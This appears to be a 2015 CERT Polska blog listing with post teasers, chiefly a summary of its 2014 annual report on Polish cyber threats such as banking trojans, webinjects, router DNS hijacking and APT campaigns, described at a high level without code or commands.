Slave, Banatrix and ransomware

3 July 2015 Łukasz Siewierski

In March 2015, S21sec published their analysis of the new e-banking trojan horse targetting Polish users. They named it “Slave”, because such a string was part of a path to one of the shared libraries. We think (in part thanks to the kernelmode.info thread) that Slave was made by the same group of authors that are responsible for previously described Banatrix and a ransomware/Android malware campaign. This means that those authors are most certainly fluent in Polish.
Read more

Sorry, but this post is not available in English

17 June 2015 Łukasz Siewierski

Read more

Threats in Polish networks – CERT Polska 2014 report (English version)

25 May 2015 piotrk

Today, we published the annual CERT Polska report in its English version. This report presents the most important trends and observations that we think shaped Polish cybersecurity in 2014. This includes new, upcoming threats, their evolution and our responses to them.

In 2014 CERT Polska continued its effort to better the security of Internet users in Poland and worldwide. Last year our efforts focused on botnet mitigation, especially when these botnets used .pl domain for command and control services. Our actions made the cybercriminals limit the use of the .pl TLD and we observed the misuse of .pl domain much more rarely. However, there are cases in which the Domain Name Tasting service (short lived domain registration) is used for Exploit Kit deployment.

The most severe threat to Polish cyberspace users were (and still are) banking trojans. In 2014, we observed the rise of Tinba, VMZeuS, Kronos and IFSB families. All of the mentioned malware uses so called “webinjects” little snippets of (usually JavaScript) code that are injected in the online bank website to perform specific tasks, like using social engineering to steal one time passwords. Webinjects also played another role: they were served when a home router was hacked and had its DNS servers changed. Due to this change, an affected user connected to the online bank website using a cybercrimals’ proxy, which in turn injected a Java-Script code to the website.

Last year we also observed an increase in APT attacks, some of which were targeting Poland: examples include APT 28, Dragon Fly and Black Energy 2. However, these operations are much broader than just being directed at Poland which remained one of many targets, rather than a primary one.

An interesting new category of malware threats made their debut: malware that changed the bank account number either in the Windows clipboard (VBKlip) or in the browser’s memory (Banatrix). There is some evidence that the authors of this malware are able to freely use Polish language and as such, we decided to analyze this malware further.

Security vulnerabilities in the basic network protocols, their implementations or other popular tools composed another piece of the cybersecurity landscape in 2014. Cybercriminals continue to use misconfigured network services like DNS or NTP to launch DDoS attacks. Data from our n6 platform provides a good estimate on the rate at which these vulnerabilities and misconfigurations are fixed by the Polish network operators.

Statistical analysis presented in this report are largely based on the data contained in the n6 platform. It aggregates over 50 different sources of information coming from over 30 different companies and groups from all over the world. The data, combined with our own sources, enables us to present this unique analysis of the state of security of Polish networks in 2014.

You can download the full English language report here.

The original Polish report, published April 21st is available here.

Malware attack on both Windows and Android

22 May 2015 Łukasz Siewierski

SECURE 2015 – Call for Speakers

8 May 2015 przemek

DGA botnet domains: malicious usage of pseudo random domains

6 May 2015 piotrb

Polish Team Wins 3rd Place in NATO Locked Shields Exercise

28 April 2015 alex